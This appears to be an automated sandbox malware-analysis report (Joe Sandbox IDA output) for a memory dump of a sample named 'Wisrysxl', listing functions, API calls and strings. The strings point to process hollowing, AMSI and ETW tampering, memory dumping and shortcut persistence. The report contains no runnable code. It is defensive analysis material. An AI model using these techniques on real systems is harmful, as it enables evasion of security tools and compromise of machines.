Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: AddressProc$AllocateHandleMemoryModuleVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 1888340430-445027087
Opcode ID: 721c563548309d42360be402fbcdb73fae7761d0d5ba362d97d0f6dae0615942
Instruction ID: 04ad797ea940bfaea9401290f9688fa28aade0376696c0be490d7b5351d258b5
Opcode Fuzzy Hash: 721c563548309d42360be402fbcdb73fae7761d0d5ba362d97d0f6dae0615942
Instruction Fuzzy Hash: 9A110975680208BFEB05EFA5ED51EAFB7EDEB48700F908461B905D7640DF34AA118B64

Function 02AA7A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E

Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9

NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02AA7A9F

Strings

yromeMlautriVetacollAwZ, xrefs: 02AA7A47
ntdll, xrefs: 02AA7A74

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: AddressProc$AllocateHandleMemoryModuleVirtual
String ID: ntdll$yromeMlautriVetacollAwZ
API String ID: 1888340430-445027087
Opcode ID: fe9785d9fd33e701be74f66de23d5afb8c3a6ce144959324961ccbb209e8e642
Instruction ID: 2647ba031a1c38a3953d0cf44aa726fed76ba51fdcf0c3a707fb999508d70046
Opcode Fuzzy Hash: fe9785d9fd33e701be74f66de23d5afb8c3a6ce144959324961ccbb209e8e642
Instruction Fuzzy Hash: 57110975680208BFEB05EFA5ED51EAFB7EDEB48700F908461B905D7640DF34AA118B64

Function 02AA8670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E

Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9

NtUnmapViewOfSection.NTDLL(?,?), ref: 02AA86D5

Strings

ntdll, xrefs: 02AA86B8
noitceSfOweiVpamnUtN, xrefs: 02AA868B

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: AddressProc$HandleModuleSectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 858119152-2520021413
Opcode ID: 5bcada767e1bf3afe91513f32f0476574cac102cae6ebefda23803b1d11f0359
Instruction ID: 3d61b6c054345c4fe64e1c794b21399867a0da4830d78d7a7aafd70b1f1a0523
Opcode Fuzzy Hash: 5bcada767e1bf3afe91513f32f0476574cac102cae6ebefda23803b1d11f0359
Instruction Fuzzy Hash: 72014F75A80304BFEB00EBA5ED61A5EB7EEEF49740F918860A40097600DF38AD029A14

Function 02AA86F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E

Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9

NtUnmapViewOfSection.NTDLL(?,?), ref: 02AA86D5

Strings

ntdll, xrefs: 02AA86B8
noitceSfOweiVpamnUtN, xrefs: 02AA868B

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: AddressProc$HandleModuleSectionUnmapView
String ID: noitceSfOweiVpamnUtN$ntdll
API String ID: 858119152-2520021413
Opcode ID: 6e958d86eeb5b257412e80125792bc0bff9bf938c4ccb7d7380cdde7581cec2d
Instruction ID: a324242a2d3b9f671d079733f18900aec0bad20f260210700b8dee510ddc32f4
Opcode Fuzzy Hash: 6e958d86eeb5b257412e80125792bc0bff9bf938c4ccb7d7380cdde7581cec2d
Instruction Fuzzy Hash: 59F01275980204EFEB04EBA5EA509AEB7FAFF48740B908465A40497610DF38AE06DF14

Function 02AAF7C8 Relevance: 222.6, APIs: 6, Strings: 116, Instructions: 9071
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

EnumProcessModules, xrefs: 02ABA9EE
DllGetActivationFactory, xrefs: 02AB006D
SetUnhandledExceptionFilter, xrefs: 02ABAC0B
sppc, xrefs: 02AB9E86, 02AB9EB9, 02AB9EEC, 02AB9F1F, 02ABAE2F, 02ABAE62
wintrust, xrefs: 02AAFC1A, 02AAFC4D, 02AAFC80
C:\\Users\\Public\\Libraries\\, xrefs: 02AB616F
EnumServicesStatusExA, xrefs: 02ABA9D0
RetailTracerEnable, xrefs: 02ABA0AF
ieproxy, xrefs: 02AAFB14, 02AAFB3B, 02AAFB6B
NtGetWriteWatch, xrefs: 02ABAE7E
WriteVirtualMemory, xrefs: 02ABABA5
RtlCreateQueryDebugBuffer, xrefs: 02ABA6DD
SLGatherMigrationBlob, xrefs: 02ABAE18
WintrustAddActionID, xrefs: 02AAFC36
VirtualAllocEx, xrefs: 02ABAB0C
RtlQueryProcessDebugInformation, xrefs: 02ABA9A3
EtwEventWrite, xrefs: 02ABB148
NtWaitForSingleObject, xrefs: 02ABA677
CreateProcessA, xrefs: 02ABA9FD
UacUninitialize, xrefs: 02AB3844, 02AB3BB2
[InternetShortcut], xrefs: 02AB6D48
NtQueryVirtualMemory, xrefs: 02ABAEB1
endpointdlp, xrefs: 02ABA464, 02ABA497, 02ABA4CA, 02ABA4FD
SLGetEncryptedPIDEx, xrefs: 02ABAE4B
ScanBuffer, xrefs: 02AAF9C6, 02AAFD1E, 02AAFF48, 02AB04AF, 02AB05BC, 02AB06D4, 02AB0AA8, 02AB0C46, 02AB0DEC, 02AB0F0C, 02AB10A1, 02AB1199, 02AB1402, 02AB15A8, 02AB1744, 02AB185A, 02AB18E8, 02AB1BFC, 02AB1E9D, 02AB1FAE, 02AB214B, 02AB24F6, 02AB2602, 02AB2820, 02AB293D, 02AB2C58, 02AB2CF9, 02AB2E6D, 02AB302D, 02AB334F, 02AB3719, 02AB39B8, 02AB3ABA, 02AB56B0, 02AB59EA, 02AB5D03, 02AB6083, 02AB63BC, 02AB6666, 02AB686B, 02AB69D1, 02AB6B45, 02AB6BC1, 02AB7764, 02AB77F5, 02AB7C25, 02AB7DB8, 02AB7F14, 02AB800C, 02AB8529, 02AB87F6, 02AB899C, 02AB8B29, 02AB8CBD, 02AB8E3C, 02AB90B3, 02AB91AB, 02AB95C7, 02AB98A0, 02AB9A39, 02AB9C6F, 02AB9D01, 02ABA039, 02ABA3D7, 02ABA906, 02ABB20C
NtQuerySecurityObject, xrefs: 02ABAFE3
UacScan, xrefs: 02AAF836, 02AB00D9, 02AB01D1, 02AB07A0, 02AB1386, 02AB1964, 02AB22C6, 02AB29D9, 02AB3C2E, 02AB5B8F, 02AB60FF, 02AB62C4, 02AB65EA, 02AB66F7, 02AB6955, 02AB6A4D, 02AB75F0, 02AB7992, 02AB7BA9, 02AB7D3C, 02AB7F90, 02AB841C, 02AB85A5, 02AB86FE, 02AB88A4, 02AB8A31, 02AB8BC5, 02AB8D44, 02AB8FBB, 02AB9429, 02AB9643, 02AB9824, 02AB99BD, 02AB9BF3, 02ABAA63
EnumServicesStatusW, xrefs: 02ABA9C1
CreateProcessAsUserW, xrefs: 02ABAA2A, 02ABAA48
NtWriteVirtualMemory, xrefs: 02ABB0AF
GET, xrefs: 02AB2455
SLLoadApplicationPolicies, xrefs: 02AB9F08
BCryptRegisterProvider, xrefs: 02AAFF0F
psapi, xrefs: 02ABA9F3
SLIsGenuineLocalEx, xrefs: 02AB9ED5
Initialize, xrefs: 02AAF8FE, 02AB081C, 02AB09B0, 02AB0B4E, 02AB0CF4, 02AB0FA9, 02AB164C, 02AB1A88, 02AB1F32, 02AB203C, 02AB2723, 02AB2A55, 02AB2D75, 02AB30A9, 02AB3257, 02AB3583, 02AB393C, 02AB5876, 02AB5C0B, 02AB6007, 02AB61CC, 02AB6438, 02AB656E, 02AB6773, 02AB76E8, 02AB83A0, 02AB93AD, 02AB9FBD, 02ABA35B, 02ABA88A, 02ABAC44, 02ABB190
URL=file:", xrefs: 02AB6D57
.url, xrefs: 02AB5D93
CreateProcessW, xrefs: 02ABAA0C
VirtualAlloc, xrefs: 02ABAAD9
MiniDumpReadDumpStream, xrefs: 02AB9262
C:\Users\Public\, xrefs: 02AB5D88, 02AB6FF3
NtOpenProcess, xrefs: 02AB928A
NtAccessCheck, xrefs: 02ABB016
ntdll, xrefs: 02AB922B, 02AB927B, 02AB928F, 02ABA628, 02ABA65B, 02ABA68E, 02ABA6C1, 02ABA6F4, 02ABAE95, 02ABAEC8, 02ABAEFB, 02ABAF2E, 02ABAF61, 02ABAF94, 02ABAFC7, 02ABAFFA, 02ABB02D, 02ABB060, 02ABB093, 02ABB0C6, 02ABB0F9, 02ABB12C, 02ABB15F
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02AB098A
NtQuerySystemInformation, xrefs: 02ABA976
EtwEventWriteEx, xrefs: 02ABB115
bcrypt, xrefs: 02AAFEC0, 02AAFEF3, 02AAFF26, 02ABA2BD
C:\Windows\System32\, xrefs: 02AB040A, 02AB796B, 02AB86B3
NtMapViewOfSection, xrefs: 02ABAF7D
can, xrefs: 02AB3D15
Advapi, xrefs: 02ABA9B7, 02ABA9C6, 02ABA9D5, 02ABA9E4, 02ABAA20, 02ABAA2F, 02ABAA3E
CreateProcessWithLogonW, xrefs: 02ABAA39
NtDeviceIoControlFile, xrefs: 02ABA985
tquery, xrefs: 02ABA0C6
acS, xrefs: 02AB3D02
DllGetClassObject, xrefs: 02AAFB03, 02AB003A, 02ABA115, 02ABADE5
/o, xrefs: 02AB64C0
WinHttp.WinHttpRequest.5.1, xrefs: 02AB233C
dbgcore, xrefs: 02AB9253, 02AB9267
Kernel32, xrefs: 02ABAA02, 02ABAA11, 02ABAA4D
EnumServicesStatusA, xrefs: 02ABA9B2
mssip32, xrefs: 02AAFDAB, 02AAFDDE, 02AAFE11, 02ABA192
NtQueryDirectoryFile, xrefs: 02ABA994
BCryptQueryProviderRegistration, xrefs: 02AAFEDC
NtSetSecurityObject, xrefs: 02AB9276
advapi32, xrefs: 02AB923F
NtAlertResumeThread, xrefs: 02ABA611
NtReadVirtualMemory, xrefs: 02ABAFB0
smartscreenps, xrefs: 02AB0051, 02AB0084, 02AB00B7
DlpCheckIsCloudSyncApp, xrefs: 02ABA480
HotKey=, xrefs: 02AB6EE1
LdrGetProcedureAddress, xrefs: 02ABB07C
OpenProcess, xrefs: 02ABAB72
FlushInstructionCache, xrefs: 02ABABD8
NtOpenSection, xrefs: 02ABAF17
OpenSession, xrefs: 02AAF89A, 02AAFA2A, 02AB0312, 02AB0433, 02AB0540, 02AB0658, 02AB0A2C, 02AB0BCA, 02AB0D70, 02AB0E90, 02AB1025, 02AB111D, 02AB130A, 02AB14B0, 02AB17DE, 02AB1A0C, 02AB1B80, 02AB1CA3, 02AB1E21, 02AB21C7, 02AB224A, 02AB2362, 02AB247A, 02AB2586, 02AB27A4, 02AB28C1, 02AB2B60, 02AB2BDC, 02AB2DF1, 02AB2F91, 02AB32D3, 02AB3461, 02AB367B, 02AB3795, 02AB3B36, 02AB5634, 02AB57CE, 02AB596E, 02AB5B13, 02AB5C87, 02AB5ED7, 02AB5F8B, 02AB6248, 02AB6340, 02AB67EF, 02AB6AC9, 02AB6C3D, 02AB6DD3, 02AB6F83, 02AB766C, 02AB7871, 02AB7A8A, 02AB7B2D, 02AB7CC0, 02AB8088, 02AB8324, 02AB8621, 02AB877A, 02AB8920, 02AB8AAD, 02AB8C41, 02AB8DC0, 02AB8EC3, 02AB9037, 02AB92B5, 02AB94A5, 02AB9796, 02AB991C, 02AB9B77, 02AB9D7D, 02AB9F41, 02ABA230, 02ABA2DF, 02ABA51F, 02ABA716, 02ABA80E, 02ABACC0, 02ABB288
BCryptVerifySignature, xrefs: 02AAFEA9, 02ABA2A6
sppwmi, xrefs: 02ABADFC
NtCreateSection, xrefs: 02ABAF4A
DllRegisterServer, xrefs: 02AAFB54, 02AB00A0
TrustOpenStores, xrefs: 02AAFC03
GetProxyDllInfo, xrefs: 02AAFB2A
psapi, xrefs: 02ABA15F
DlpNotifyPreDragDrop, xrefs: 02ABA44D
MiniDumpWriteDump, xrefs: 02AB924E
VirtualProtect, xrefs: 02ABAB3F
CryptSIPGetSignedDataMsg, xrefs: 02AAFDFA
I_QueryTagInformation, xrefs: 02AB923A
C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02AB64AA
ScanString, xrefs: 02AAF962, 02AAFB8D, 02AAFCA2, 02AAFE33, 02AAFFC4, 02AB024D, 02AB038E, 02AB0914, 02AB152C, 02AB16C8, 02AB1B04, 02AB1D1F, 02AB1D9B, 02AB20B8, 02AB23DE, 02AB26A7, 02AB2AE4, 02AB2F15, 02AB3125, 02AB31DB, 02AB34DD, 02AB35FF, 02AB38C0, 02AB55B8, 02AB5752, 02AB5A97, 02AB5E5B, 02AB64F2, 02AB6CD8, 02AB6E4F, 02AB6F07, 02AB7574, 02AB7A0E, 02AB7E75, 02AB8498, 02AB8F3F, 02AB9331, 02AB971A, 02AB9AFB, 02AB9DF9, 02ABA1B4, 02ABA59B, 02ABA792, 02ABAD3C
LdrLoadDll, xrefs: 02ABB049
CryptSIPVerifyIndirectData, xrefs: 02AAFDC7, 02ABA17B
GZmMS1j, xrefs: 02AAF80F
NtOpenFile, xrefs: 02ABB0E2
IconIndex=, xrefs: 02AB6DAD
http, xrefs: 02AB2128
CreateProcessAsUserA, xrefs: 02ABAA1B
spp, xrefs: 02ABA0F9, 02ABA12C, 02ABADC9
FindCertsByIssuer, xrefs: 02AAFC69
DlpGetArchiveFileTraceInfo, xrefs: 02ABA4B3
SxTracerGetThreadContextDebug, xrefs: 02ABA0E2, 02ABADB2
kernel32, xrefs: 02ABAAF0, 02ABAB23, 02ABAB56, 02ABAB89, 02ABABBC, 02ABABEF, 02ABAC22
UacInitialize, xrefs: 02AAFA8E, 02AB0155, 02AB0898, 02AB553C, 02AB58F2, 02AB5DDF, 02AB78ED, 02AB912F, 02AB954B
SLGetGenuineInformation, xrefs: 02AB9E6F
CryptSIPGetInfo, xrefs: 02AAFD94
Ntdll, xrefs: 02ABA97B, 02ABA98A, 02ABA999, 02ABA9A8
RtlAllocateHeap, xrefs: 02ABA644, 02ABA6AA
NtOpenObjectAuditAlarm, xrefs: 02AB9226
SLGetSLIDList, xrefs: 02AB9EA2
/d , xrefs: 02AB64B5
NtQueryInformationThread, xrefs: 02ABAEE4
GetProcessMemoryInfo, xrefs: 02ABA148
DlpGetWebSiteAccess, xrefs: 02ABA4E6
EnumServicesStatusExW, xrefs: 02ABA9DF

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: Module$AddressFileHandleNamePathProc$AttributesCheckCloseDebuggerFreeLibraryName_PresentRemote
String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
API String ID: 3113829192-2693441831
Opcode ID: f35ea61aa49307a361a49048da548da2bd57cab0795552531b30ba5c4e8e1869
Instruction ID: 66d4dacf97785467353d8f106c1cd84f4057ef898fa5a08929eba8cb786c7f76
Opcode Fuzzy Hash: f35ea61aa49307a361a49048da548da2bd57cab0795552531b30ba5c4e8e1869
Instruction Fuzzy Hash: FA14F575A80118DFDF21EB65DE90ACE73FAFF89304F5044A69409AB614DE30AE92CF51

Function 02AB8122 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2780
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02AA89D0: FreeLibrary.KERNEL32(02B17388,00000000,00000000,00000000,00000000,02B1738C,Function_0000562C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,02B17388,00000000,00000000), ref: 02AA8AAA

CreateProcessAsUserW.ADVAPI32(02C0B7DC,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C0B7E0,02C0B824,OpenSession,02B12F60,02ABB7B8,UacScan,02B12F60), ref: 02AB86E9
ResumeThread.KERNEL32(02C0B828,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8,UacScan,02B12F60,02ABB7B8,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8), ref: 02AB8D33
CloseHandle.KERNEL32(02C0B824,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8,UacScan,02B12F60,02ABB7B8,02C0B828,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60), ref: 02AB8EB2

Part of subcall function 02AA894C: LoadLibraryW.KERNEL32(?,?), ref: 02AA8960
Part of subcall function 02AA894C: GetProcAddress.KERNEL32(02B17394,BCryptVerifySignature), ref: 02AA897A
Part of subcall function 02AA894C: FreeLibrary.KERNEL32(02B17394,02B17394,BCryptVerifySignature,bcrypt,?,02B173D4,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6

CloseHandle.KERNEL32(02C0B824,02C0B824,ScanBuffer,02B12F60,02ABB7B8,UacInitialize,02B12F60,02ABB7B8,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8,UacScan,02B12F60), ref: 02AB92A4

Part of subcall function 02AADC8C: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 02AADCCB
Part of subcall function 02AADC8C: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 02AADD32
Part of subcall function 02AADC8C: NtClose.NTDLL(?), ref: 02AADD3B

Part of subcall function 02AA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02AA83C2), ref: 02AA83A4

ExitProcess.KERNEL32(00000000,OpenSession,02B12F60,02ABB7B8,ScanBuffer,02B12F60,02ABB7B8,Initialize,02B12F60,02ABB7B8,00000000,00000000,00000000,ScanString,02B12F60,02ABB7B8), ref: 02ABB2FA

Strings

EnumProcessModules, xrefs: 02ABA9EE
SetUnhandledExceptionFilter, xrefs: 02ABAC0B
sppc, xrefs: 02AB9E86, 02AB9EB9, 02AB9EEC, 02AB9F1F, 02ABAE2F, 02ABAE62
NtSetSecurityObject, xrefs: 02AB9276
advapi32, xrefs: 02AB923F
NtAlertResumeThread, xrefs: 02ABA611
NtReadVirtualMemory, xrefs: 02ABAFB0
EnumServicesStatusExA, xrefs: 02ABA9D0
DlpCheckIsCloudSyncApp, xrefs: 02ABA480
RetailTracerEnable, xrefs: 02ABA0AF
LdrGetProcedureAddress, xrefs: 02ABB07C
OpenProcess, xrefs: 02ABAB72
FlushInstructionCache, xrefs: 02ABABD8
NtOpenSection, xrefs: 02ABAF17
NtGetWriteWatch, xrefs: 02ABAE7E
WriteVirtualMemory, xrefs: 02ABABA5
RtlCreateQueryDebugBuffer, xrefs: 02ABA6DD
SLGatherMigrationBlob, xrefs: 02ABAE18
VirtualAllocEx, xrefs: 02ABAB0C
OpenSession, xrefs: 02AB8134, 02AB82A8, 02AB8324, 02AB8621, 02AB877A, 02AB8920, 02AB8AAD, 02AB8C41, 02AB8DC0, 02AB8EC3, 02AB9037, 02AB92B5, 02AB94A5, 02AB9796, 02AB991C, 02AB9B77, 02AB9D7D, 02AB9F41, 02ABA230, 02ABA2DF, 02ABA51F, 02ABA716, 02ABA80E, 02ABACC0, 02ABB288
RtlQueryProcessDebugInformation, xrefs: 02ABA9A3
BCryptVerifySignature, xrefs: 02ABA2A6
sppwmi, xrefs: 02ABADFC
EtwEventWrite, xrefs: 02ABB148
NtWaitForSingleObject, xrefs: 02ABA677
NtCreateSection, xrefs: 02ABAF4A
CreateProcessA, xrefs: 02ABA9FD
NtQueryVirtualMemory, xrefs: 02ABAEB1
endpointdlp, xrefs: 02ABA464, 02ABA497, 02ABA4CA, 02ABA4FD
SLGetEncryptedPIDEx, xrefs: 02ABAE4B
ScanBuffer, xrefs: 02AB8529, 02AB87F6, 02AB899C, 02AB8B29, 02AB8CBD, 02AB8E3C, 02AB90B3, 02AB91AB, 02AB95C7, 02AB98A0, 02AB9A39, 02AB9C6F, 02AB9D01, 02ABA039, 02ABA3D7, 02ABA906, 02ABB20C
psapi, xrefs: 02ABA15F
NtQuerySecurityObject, xrefs: 02ABAFE3
DlpNotifyPreDragDrop, xrefs: 02ABA44D
UacScan, xrefs: 02AB841C, 02AB85A5, 02AB86FE, 02AB88A4, 02AB8A31, 02AB8BC5, 02AB8D44, 02AB8FBB, 02AB9429, 02AB9643, 02AB9824, 02AB99BD, 02AB9BF3, 02ABAA63
MiniDumpWriteDump, xrefs: 02AB924E
EnumServicesStatusW, xrefs: 02ABA9C1
VirtualProtect, xrefs: 02ABAB3F
CreateProcessAsUserW, xrefs: 02ABAA2A, 02ABAA48
I_QueryTagInformation, xrefs: 02AB923A
NtWriteVirtualMemory, xrefs: 02ABB0AF
ScanString, xrefs: 02AB822C, 02AB8498, 02AB8F3F, 02AB9331, 02AB971A, 02AB9AFB, 02AB9DF9, 02ABA1B4, 02ABA59B, 02ABA792, 02ABAD3C
LdrLoadDll, xrefs: 02ABB049
SLLoadApplicationPolicies, xrefs: 02AB9F08
CryptSIPVerifyIndirectData, xrefs: 02ABA17B
psapi, xrefs: 02ABA9F3
SLIsGenuineLocalEx, xrefs: 02AB9ED5
NtOpenFile, xrefs: 02ABB0E2
Initialize, xrefs: 02AB81B0, 02AB83A0, 02AB93AD, 02AB9FBD, 02ABA35B, 02ABA88A, 02ABAC44, 02ABB190
CreateProcessAsUserA, xrefs: 02ABAA1B
CreateProcessW, xrefs: 02ABAA0C
spp, xrefs: 02ABA0F9, 02ABA12C, 02ABADC9
VirtualAlloc, xrefs: 02ABAAD9
DlpGetArchiveFileTraceInfo, xrefs: 02ABA4B3
MiniDumpReadDumpStream, xrefs: 02AB9262
SxTracerGetThreadContextDebug, xrefs: 02ABA0E2, 02ABADB2
NtOpenProcess, xrefs: 02AB928A
NtAccessCheck, xrefs: 02ABB016
UacInitialize, xrefs: 02AB912F, 02AB954B
kernel32, xrefs: 02ABAAF0, 02ABAB23, 02ABAB56, 02ABAB89, 02ABABBC, 02ABABEF, 02ABAC22
SLGetGenuineInformation, xrefs: 02AB9E6F
ntdll, xrefs: 02AB922B, 02AB927B, 02AB928F, 02ABA628, 02ABA65B, 02ABA68E, 02ABA6C1, 02ABA6F4, 02ABAE95, 02ABAEC8, 02ABAEFB, 02ABAF2E, 02ABAF61, 02ABAF94, 02ABAFC7, 02ABAFFA, 02ABB02D, 02ABB060, 02ABB093, 02ABB0C6, 02ABB0F9, 02ABB12C, 02ABB15F
NtQuerySystemInformation, xrefs: 02ABA976
EtwEventWriteEx, xrefs: 02ABB115
bcrypt, xrefs: 02ABA2BD
C:\Windows\System32\, xrefs: 02AB86B3
NtMapViewOfSection, xrefs: 02ABAF7D
Advapi, xrefs: 02ABA9B7, 02ABA9C6, 02ABA9D5, 02ABA9E4, 02ABAA20, 02ABAA2F, 02ABAA3E
Ntdll, xrefs: 02ABA97B, 02ABA98A, 02ABA999, 02ABA9A8
CreateProcessWithLogonW, xrefs: 02ABAA39
RtlAllocateHeap, xrefs: 02ABA644, 02ABA6AA
NtDeviceIoControlFile, xrefs: 02ABA985
tquery, xrefs: 02ABA0C6
NtOpenObjectAuditAlarm, xrefs: 02AB9226
DllGetClassObject, xrefs: 02ABA115, 02ABADE5
SLGetSLIDList, xrefs: 02AB9EA2
NtQueryInformationThread, xrefs: 02ABAEE4
GetProcessMemoryInfo, xrefs: 02ABA148
dbgcore, xrefs: 02AB9253, 02AB9267
Kernel32, xrefs: 02ABAA02, 02ABAA11, 02ABAA4D
EnumServicesStatusA, xrefs: 02ABA9B2
mssip32, xrefs: 02ABA192
NtQueryDirectoryFile, xrefs: 02ABA994
DlpGetWebSiteAccess, xrefs: 02ABA4E6
EnumServicesStatusExW, xrefs: 02ABA9DF

Memory Dump Source

Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd

Similarity

API ID: CloseLibrary$FreeHandlePathProcess$AddressCacheCreateExitFileFlushInstructionLoadNameName_ProcResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 376050052-1225450241
Opcode ID: a09d55ebb0311cb1f7889d089a1ffbf87f17272eafd831353dfd538b9d9e4b5a
